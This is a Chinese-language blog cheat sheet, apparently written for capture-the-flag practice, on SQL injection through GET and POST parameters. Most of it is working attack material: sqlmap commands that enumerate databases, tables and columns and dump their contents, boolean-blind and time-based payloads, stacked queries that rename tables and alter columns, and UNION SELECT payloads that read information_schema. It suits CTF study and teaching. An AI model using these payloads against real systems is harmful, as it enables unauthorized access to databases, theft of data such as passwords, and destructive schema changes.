zoukankan      html  css  js  c++  java
  • sql 注入get与post模式语句

    目录

    get

    sqlmap -u url/?inject=1
    ---
    Parameter: inject (GET)   # get
        Type: boolean-based blind   #布尔盲注
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: inject=1' AND 2572=2572 AND 'WxsW'='WxsW
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: inject=1' AND SLEEP(5) AND 'EApM'='EApM
    ---
    1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#
    这段代码的意思是将words表名改为words1,1919810931114514表名改为words,将现在的words表中的flag列名改为id 然后用1' or 1=1 #得到flag值
    
    get sqlmap url
    先爆出数据库名字 sqlmap -u url/?inject=1 --current-db url?inject=1';show databases;#
    再爆出表名 sqlmap -u url/?inject=1 -D 数据库名字 --tables 1';show tables;#
    再爆出重点内容比如用户名字密码 sqlmap -u url/?inject=1 -D 数据库名字 -T 表名字 --columns 1';show columns from 库名;#
    得到密码 sqlmap -u url/?inject=1 -D 数据库名字 -T 表名 -C "字段" --dump

    post

    查询 sqlmap url
    1.获取注入点 sqlmap -u url --data "search=df" ' union select 1,2,3 #
    2.获取数据库信息 sqlmap -u url --data "search=df" -dbs ' union select 1,2,3 #
    3.获取库内表信息 sqlmap -u url --data "search=df" -D 库名 --tables ' and 0 union select 1,table_schema,table_name from information_schema.columns #
    4.获取表内字段信息 sqlmap -u url --data "search=df" -D 库名 -T 表名 --columns ' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='news'#
    5.获取字段内容,得到flag sqlmap -u url --data "search=df" -D 库名 -T 表名 -C "字段" --dump ' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'#
  • 相关阅读:
    分析内存泄露问题
    Android 官方博客
    python 2.*和3.*的变化
    python __init__.py
    关于python的import
    Android----Gradle
    Python---string
    uwsgi01---uwsgi文件
    Nginx02---指令集实现静态文件服务器
    python依赖文件的生成requirement.txt
  • 原文地址:https://www.cnblogs.com/jiangyatao/p/13444922.html
Copyright © 2011-2022 走看看